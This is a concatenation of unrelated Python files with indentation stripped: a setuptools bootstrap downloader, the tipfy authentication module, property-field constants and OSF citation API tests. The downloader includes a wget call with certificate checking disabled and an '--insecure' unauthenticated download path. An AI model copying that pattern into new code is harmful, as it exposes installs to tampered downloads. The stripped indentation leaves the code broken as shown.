if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--no-check-certificate', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""
Use Python to download the file, even though it cannot authenticate the
connection.
"""
src = urlopen(url)
try:
# Read all the data in one block.
data = src.read()
finally:
src.close()
# Write all the data in one block to avoid creating a partial file.
with open(target, "wb") as dst:
dst.write(data)
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = (
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
)
viable_downloaders = (dl for dl in downloaders if dl.viable())
return next(viable_downloaders, None)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, delay=15, downloader_factory=get_best_downloader):
"""
Download setuptools from a specified location and return its filename
`version` should be a valid setuptools version number that is available
as an sdist for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
``downloader_factory`` should be a function taking no arguments and
returning a function for downloading a URL to a target.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
zip_name = "setuptools-%s.zip" % version
url = download_base + zip_name
saveto = os.path.join(to_dir, zip_name)
if not os.path.exists(saveto): # Avoid repeated downloads
log.warn("Downloading %s", url)
downloader = downloader_factory()
downloader(url, saveto)
return os.path.realpath(saveto)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package
"""
return ['--user'] if options.user_install else []
def _parse_args():
"""
Parse the command line for options
"""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the setuptools package')
parser.add_option(
'--insecure', dest='downloader_factory', action='store_const',
const=lambda: download_file_insecure, default=get_best_downloader,
help='Use internal, non-validating downloader'
)
parser.add_option(
'--version', help="Specify which version to download",
default=DEFAULT_VERSION,
)
options, args = parser.parse_args()
# positional arguments are ignored
return options
def main():
"""Install or upgrade setuptools and EasyInstall"""
options = _parse_args()
archive = download_setuptools(
version=options.version,
download_base=options.download_base,
downloader_factory=options.downloader_factory,
)
return _install(archive, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main())
|
|
# -*- coding: utf-8 -*-
"""
tipfy.auth
~~~~~~~~~~
Base classes for user authentication.
:copyright: 2011 by tipfy.org.
:license: BSD, see LICENSE.txt for more details.
"""
from __future__ import absolute_import
import uuid
from werkzeug import abort
from tipfy import DEV_APPSERVER
from werkzeug import (cached_property, check_password_hash,
generate_password_hash, import_string)
#: Default configuration values for this module. Keys are:
#:
#: user_model
#: A ``db.Model`` class used for authenticated users, as a string.
#: Default is `tipfy.appengine.auth.model.User`.
#:
#: secure_urls
#: True to use secure URLs for login, logout and sign up, False otherwise.
#: Default is False.
#:
#: cookie_name
#: Name of the autentication cookie. Default is `session`, which stores
#: the data in the default session.
#:
#: session_max_age
#: Interval in seconds before a user session id is renewed.
#: Default is 1 week.
default_config = {
'user_model': 'tipfy.appengine.auth.model.User',
'cookie_name': 'session',
'secure_urls': False,
'session_max_age': 86400 * 7,
}
class BaseAuthStore(object):
def __init__(self, request):
self.request = request
self.app = request.app
self.config = request.app.config[__name__]
@cached_property
def user_model(self):
"""Returns the configured user model.
:returns:
A :class:`tipfy.auth.model.User` class.
"""
registry = self.app.registry
key = 'auth.user_model'
if key not in registry:
registry[key] = import_string(self.config['user_model'])
return registry[key]
@cached_property
def _session_base(self):
cookie_name = self.config['cookie_name']
return self.request.session_store.get_session(cookie_name)
def _url(self, _name, **kwargs):
kwargs.setdefault('redirect', self.request.path)
if not DEV_APPSERVER and self.config['secure_urls']:
kwargs['_scheme'] = 'https'
return self.app.router.url_for(self.request, _name, kwargs)
def login_url(self, **kwargs):
"""Returns a URL that, when visited, prompts the user to sign in.
:returns:
A URL to perform login.
"""
return self._url('auth/login', **kwargs)
def logout_url(self, **kwargs):
"""Returns a URL that, when visited, logs out the user.
:returns:
A URL to perform logout.
"""
return self._url('auth/logout', **kwargs)
def signup_url(self, **kwargs):
"""Returns a URL that, when visited, prompts the user to sign up.
:returns:
A URL to perform signup.
"""
return self._url('auth/signup', **kwargs)
def create_user(self, username, auth_id, **kwargs):
"""Creates a new user entity.
:param username:
Unique username.
:param auth_id:
Unique authentication id. For App Engine users it is 'gae:user_id'.
:returns:
The new entity if the username is available, None otherwise.
"""
return self.user_model.create(username, auth_id, **kwargs)
def get_user_entity(self, username=None, auth_id=None):
"""Loads an user entity from datastore. Override this to implement
a different loading method. This method will load the user depending
on the way the user is being authenticated: for form authentication,
username is used; for third party or App Engine authentication,
auth_id is used.
:param username:
Unique username.
:param auth_id:
Unique authentication id.
:returns:
A ``User`` model instance, or None.
"""
if auth_id:
return self.user_model.get_by_auth_id(auth_id)
elif username:
return self.user_model.get_by_username(username)
@property
def session(self):
"""The auth session. For third party auth, it is possible that an
auth session exists but :attr:`user` is None (the user wasn't created
yet). We access the session to check if the user is logged in but
doesn't have an account.
"""
raise NotImplementedError()
@property
def user(self):
"""The user entity."""
raise NotImplementedError()
class SessionAuthStore(BaseAuthStore):
"""Base store for auth stores that use own session."""
def __init__(self, *args, **kwargs):
super(SessionAuthStore, self).__init__(*args, **kwargs)
self.loaded = False
self._session = self._user = None
@property
def session(self):
"""Returns the currently logged in user session."""
if not self.loaded:
self._load_session_and_user()
return self._session
@property
def user(self):
"""Returns the currently logged in user entity or None.
:returns:
A :class:`User` entity, if the user for the current request is
logged in, or None.
"""
if not self.loaded:
self._load_session_and_user()
return self._user
def create_user(self, username, auth_id, **kwargs):
user = super(SessionAuthStore, self).create_user(username,
auth_id, **kwargs)
if user:
self._set_session(auth_id, user)
return user
def logout(self):
"""Logs out the current user. This deletes the authentication session.
"""
self.loaded = True
self._session_base.pop('_auth', None)
self._session = self._user = None
def _load_session_and_user(self):
raise NotImplementedError()
def _set_session(self, auth_id, user=None, remember=False):
kwargs = {}
session = {'id': auth_id}
if user:
session['token'] = user.session_id
if remember:
kwargs['max_age'] = self.config['session_max_age']
else:
kwargs['max_age'] = None
self._session_base['_auth'] = self._session = session
self.request.session_store.update_session_args(
self.config['cookie_name'], **kwargs)
class MultiAuthStore(SessionAuthStore):
"""Store used for custom or third party authentication."""
def login_with_form(self, username, password, remember=False):
"""Authenticates the current user using data from a form.
:param username:
Username.
:param password:
Password.
:param remember:
True if authentication should be persisted even if user leaves the
current session (the "remember me" feature).
:returns:
True if login was succesfull, False otherwise.
"""
self.loaded = True
user = self.get_user_entity(username=username)
if user is not None and user.check_password(password):
# Successful login. Check if session id needs renewal.
user.renew_session(max_age=self.config['session_max_age'])
# Make the user available.
self._user = user
# Store the cookie.
self._set_session(user.auth_id, user, remember)
return True
# Authentication failed.
return False
def login_with_auth_id(self, auth_id, remember=False, **kwargs):
"""Called to authenticate the user after a third party confirmed
authentication.
:param auth_id:
Authentication id, generally a combination of service name and
user identifier for the service, e.g.: 'twitter|john'.
:param remember:
True if authentication should be persisted even if user leaves the
current session (the "remember me" feature).
:returns:
None. This always authenticates the user.
"""
self.loaded = True
self._user = self.get_user_entity(auth_id=auth_id)
if self._user:
# Set current user from datastore.
self._set_session(auth_id, self._user, remember)
else:
# Simply set a session; user will be created later if required.
self._set_session(auth_id, remember=remember)
def _load_session_and_user(self):
self.loaded = True
session = self._session_base.get('_auth', {})
auth_id = session.get('id')
session_token = session.get('token')
if auth_id is None or session_token is None:
# No session, no user.
return
self._session = session
# Fetch the user entity.
user = self.get_user_entity(auth_id=auth_id)
if user is None:
# Bad auth id or token, no fallback: must log in again.
return
current_token = user.session_id
if not user.check_session(session_token):
# Token didn't match.
return self.logout()
# Successful login. Check if session id needs renewal.
user.renew_session(max_age=self.config['session_max_age'])
if (current_token != user.session_id) or user.auth_remember:
# Token was updated or we need to renew session per request.
self._set_session(auth_id, user, user.auth_remember)
self._user = user
class LoginRequiredMiddleware(object):
"""A RequestHandler middleware to require user authentication. This
acts as a `login_required` decorator but for handler classes. Example::
from tipfy import RequestHandler
from tipfy.auth import LoginRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [LoginRequiredMiddleware]
def get(self, **kwargs):
return 'Only logged in users can see this.'
"""
def before_dispatch(self, handler):
return _login_required(handler)
class UserRequiredMiddleware(object):
"""A RequestHandler middleware to require the current user to have an
account saved in datastore. This acts as a `user_required` decorator but
for handler classes. Example::
from tipfy import RequestHandler
from tipfy.auth import UserRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [UserRequiredMiddleware]
def get(self, **kwargs):
return 'Only users can see this.'
"""
def before_dispatch(self, handler):
return _user_required(handler)
class UserRequiredIfAuthenticatedMiddleware(object):
"""A RequestHandler middleware to require the current user to have an
account saved in datastore, but only if he is logged in. This acts as a
`user_required_if_authenticated` decorator but for handler classes.
Example::
from tipfy import RequestHandler
from tipfy.auth import UserRequiredIfAuthenticatedMiddleware
class MyHandler(RequestHandler):
middleware = [UserRequiredIfAuthenticatedMiddleware]
def get(self, **kwargs):
return 'Only non-logged in users or users with saved '
'accounts can see this.'
"""
def before_dispatch(self, handler):
return _user_required_if_authenticated(handler)
class AdminRequiredMiddleware(object):
"""A RequestHandler middleware to require the current user to be admin.
This acts as a `admin_required` decorator but for handler classes.
Example::
from tipfy import RequestHandler
from tipfy.auth import AdminRequiredMiddleware
class MyHandler(RequestHandler):
middleware = [AdminRequiredMiddleware]
def get(self, **kwargs):
return 'Only admins can see this.'
"""
def before_dispatch(self, handler):
return _admin_required(handler)
def login_required(func):
"""A RequestHandler method decorator to require user authentication.
Normally :func:`user_required` is used instead. Example::
from tipfy import RequestHandler
from tipfy.auth import login_required
class MyHandler(RequestHandler):
@login_required
def get(self, **kwargs):
return 'Only logged in users can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _login_required(self) or func(self, *args, **kwargs)
return decorated
def user_required(func):
"""A RequestHandler method decorator to require the current user to
have an account saved in datastore. Example::
from tipfy import RequestHandler
from tipfy.auth import user_required
class MyHandler(RequestHandler):
@user_required
def get(self, **kwargs):
return 'Only users can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _user_required(self) or func(self, *args, **kwargs)
return decorated
def user_required_if_authenticated(func):
"""A RequestHandler method decorator to require the current user to
have an account saved in datastore, but only if he is logged in. Example::
from tipfy import RequestHandler
from tipfy.auth import user_required_if_authenticated
class MyHandler(RequestHandler):
@user_required_if_authenticated
def get(self, **kwargs):
return 'Only non-logged in users or users with saved '
'accounts can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _user_required_if_authenticated(self) or \
func(self, *args, **kwargs)
return decorated
def admin_required(func):
"""A RequestHandler method decorator to require the current user to be
admin. Example::
from tipfy import RequestHandler
from tipfy.auth import admin_required
class MyHandler(RequestHandler):
@admin_required
def get(self, **kwargs):
return 'Only admins can see this.'
:param func:
The handler method to be decorated.
:returns:
The decorated method.
"""
def decorated(self, *args, **kwargs):
return _admin_required(self) or func(self, *args, **kwargs)
return decorated
def create_session_id():
return uuid.uuid4().hex
def _login_required(handler):
"""Implementation for login_required and LoginRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
def _user_required(handler):
"""Implementation for user_required and UserRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
if not auth.user:
return handler.redirect(auth.signup_url())
def _user_required_if_authenticated(handler):
"""Implementation for user_required_if_authenticated and
UserRequiredIfAuthenticatedMiddleware.
"""
auth = handler.auth
if auth.session and not auth.user:
return handler.redirect(auth.signup_url())
def _admin_required(handler):
"""Implementation for admin_required and AdminRequiredMiddleware."""
auth = handler.auth
if not auth.session:
return handler.redirect(auth.login_url())
if not auth.user or not auth.user.is_admin:
abort(403)
|
|
EXCLUDE_FIELDS = [
'best_guess_canonical_building',
'best_guess_confidence',
'canonical_building',
'canonical_for_ds',
'children',
'confidence',
'created',
'extra_data',
'id',
'import_file',
'last_modified_by',
'match_type',
'modified',
'parents',
'pk',
'seed_org',
'source_type',
'super_organization',
]
META_FIELDS = [
'best_guess_canonical_building',
'best_guess_confidence',
'canonical_for_ds',
'confidence',
'match_type',
'source_type',
]
ASSESSOR_FIELDS = [
{
"title": "PM Property ID",
"sort_column": "pm_property_id",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Tax Lot ID",
"sort_column": "tax_lot_id",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Custom ID 1",
"sort_column": "custom_id_1",
"class": "is_aligned_right whitespace",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False,
"static": False,
"link": True
},
{
"title": "Property Name",
"sort_column": "property_name",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Address Line 1",
"sort_column": "address_line_1",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Address Line 2",
"sort_column": "address_line_2",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "County/District/Ward/Borough",
"sort_column": "district",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Lot Number",
"sort_column": "lot_number",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Block Number",
"sort_column": "block_number",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "City",
"sort_column": "city",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "State Province",
"sort_column": "state_province",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Postal Code",
"sort_column": "postal_code",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Year Built",
"sort_column": "year_built",
"class": "is_aligned_right",
"title_class": "",
"type": "number",
"min": "year_built__gte",
"max": "year_built__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Use Description",
"sort_column": "use_description",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Building Count",
"sort_column": "building_count",
"class": "is_aligned_right",
"title_class": "",
"type": "number",
"min": "building_count__gte",
"max": "building_count__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Property Notes",
"sort_column": "property_notes",
"class": "",
"title_class": "",
"type": "string",
"field_type": "building_information",
"checked": False
},
{
"title": "Recent Sale Date",
"sort_column": "recent_sale_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "recent_sale_date__gte",
"max": "recent_sale_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Owner",
"sort_column": "owner",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Address",
"sort_column": "owner_address",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner City",
"sort_column": "owner_city_state",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Postal Code",
"sort_column": "owner_postal_code",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Email",
"sort_column": "owner_email",
"class": "",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Owner Telephone",
"sort_column": "owner_telephone",
"class": "is_aligned_right",
"title_class": "",
"type": "string",
"field_type": "contact_information",
"checked": False
},
{
"title": "Gross Floor Area",
"sort_column": "gross_floor_area",
"subtitle": u"ft" + u"\u00B2",
"class": "is_aligned_right",
"type": "floor_area",
"min": "gross_floor_area__gte",
"max": "gross_floor_area__lte",
"field_type": "assessor",
"checked": False
},
{
"title": "Energy Star Score",
"sort_column": "energy_score",
"class": "is_aligned_right",
"type": "number",
"min": "energy_score__gte",
"max": "energy_score__lte",
"field_type": "pm",
"checked": False
},
{
"title": "Site EUI",
"sort_column": "site_eui",
"class": "is_aligned_right",
"type": "number",
"min": "site_eui__gte",
"max": "site_eui__lte",
"field_type": "pm",
"checked": False
},
{
"title": "Generation Date",
"sort_column": "generation_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "generation_date__gte",
"max": "generation_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Release Date",
"sort_column": "release_date",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "release_date__gte",
"max": "release_date__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Year Ending",
"sort_column": "year_ending",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "year_ending__gte",
"max": "year_ending__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Creation Date",
"sort_column": "created",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "created__gte",
"max": "created__lte",
"field_type": "building_information",
"checked": False
},
{
"title": "Modified Date",
"sort_column": "modified",
"class": "is_aligned_right",
"title_class": "",
"type": "date",
"min": "modified__gte",
"max": "modified__lte",
"field_type": "building_information",
"checked": False
}
]
ASSESSOR_FIELDS_BY_COLUMN = {field['sort_column']: field
for field in ASSESSOR_FIELDS}
|
|
from nose.tools import * # flake8: noqa
from website.util import permissions
from api.base.settings.defaults import API_BASE
from api.citations import utils as citation_utils
from tests.base import ApiTestCase
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
AlternativeCitationFactory
)
def payload(name=None, text=None, _id=None):
data = {'data': {
'type': 'citations',
'attributes': {}
}
}
if name is not None:
data['data']['attributes']['name'] = name
if text is not None:
data['data']['attributes']['text'] = text
if _id is not None:
data['data']['id'] = _id
return data
def set_up_citation_and_project(admin, public=True, registration=False, contrib=None, citation2=False, for_delete=False, bad=False):
project = ProjectFactory(creator=admin, is_public=public)
citation = AlternativeCitationFactory(name='name', text='text')
project.alternative_citations.add(citation)
if contrib:
project.add_contributor(contrib, permissions=[permissions.READ, permissions.WRITE], visible=True)
if citation2:
citation2 = AlternativeCitationFactory(name='name2', text='text2')
project.alternative_citations.add(citation2)
project.save()
slug = 1 if bad else citation._id
if registration:
project = RegistrationFactory(project=project, is_public=public)
citation_url = '/{}registrations/{}/citations/{}/'.format(API_BASE, project._id, slug)
else:
citation_url = '/{}nodes/{}/citations/{}/'.format(API_BASE, project._id, slug)
if for_delete:
return project, citation_url
return citation, citation_url
class TestUpdateAlternativeCitations(ApiTestCase):
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, patch=False, **kwargs):
name = kwargs.pop('name', None)
text = kwargs.pop('text', None)
admin = AuthUserFactory()
if is_admin:
user = admin
elif not logged_out:
user = AuthUserFactory()
kwargs['contrib'] = user if is_contrib else None
citation, citation_url = set_up_citation_and_project(admin, **kwargs)
data = payload(name=name, text=text, _id=citation._id)
if patch:
if not logged_out:
res = self.app.patch_json_api(citation_url, data, auth=user.auth, expect_errors=errors)
else:
res = self.app.patch_json_api(citation_url, data, expect_errors=errors)
else:
if not logged_out:
res = self.app.put_json_api(citation_url, data, auth=user.auth, expect_errors=errors)
else:
res = self.app.put_json_api(citation_url, data, expect_errors=errors)
return res, citation
def test_update_citation_name_admin_public(self):
res, citation = self.request(name="Test",
text="text",
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'Test')
citation.reload()
assert_equal(citation.name, "Test")
def test_update_citation_name_admin_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'Test')
citation.reload()
assert_equal(citation.name, "Test")
def test_update_citation_name_non_admin_public(self):
res, citation = self.request(name="Test",
text="text",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_admin_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_contrib_public(self):
res, citation = self.request(name="Test",
text="text",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_non_contrib_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_logged_out_public(self):
res, citation = self.request(name="Test",
text="text",
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_name_logged_out_private(self):
res, citation = self.request(name="Test",
text="text",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_text_admin_public(self):
res, citation = self.request(name="name",
text="Test",
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.text, "Test")
def test_update_citation_text_admin_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.text, "Test")
def test_update_citation_text_non_admin_public(self):
res, citation = self.request(name="name",
text="Test",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_admin_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_contrib_public(self):
res, citation = self.request(name="name",
text="Test",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_non_contrib_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_logged_out_public(self):
res, citation = self.request(name="name",
text="Test",
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_text_logged_out_private(self):
res, citation = self.request(name="name",
text="Test",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_admin_public(self):
res, citation = self.request(name="Test",
text="Test",
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.name, citation.text, "Test")
def test_update_citation_admin_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], res.json['data']['attributes']['text'], 'Test')
citation.reload()
assert_equal(citation.name, citation.text, "Test")
def test_update_citation_non_admin_public(self):
res, citation = self.request(name="Test",
text="Test",
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_public(self):
res, citation = self.request(name="Test",
text="Test",
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_public(self):
res, citation = self.request(name="Test",
text="Test",
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_repeat_name_admin_public(self):
res, citation = self.request(name="name2",
text="text",
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_admin_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_admin_public(self):
res, citation = self.request(name="name2",
text="text",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_admin_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_contrib_public(self):
res, citation = self.request(name="name2",
text="text",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_contrib_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_logged_out_public(self):
res, citation = self.request(name="name2",
text="text",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_logged_out_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_text_admin_public(self):
res, citation = self.request(name="name",
text="text2",
is_admin=True,
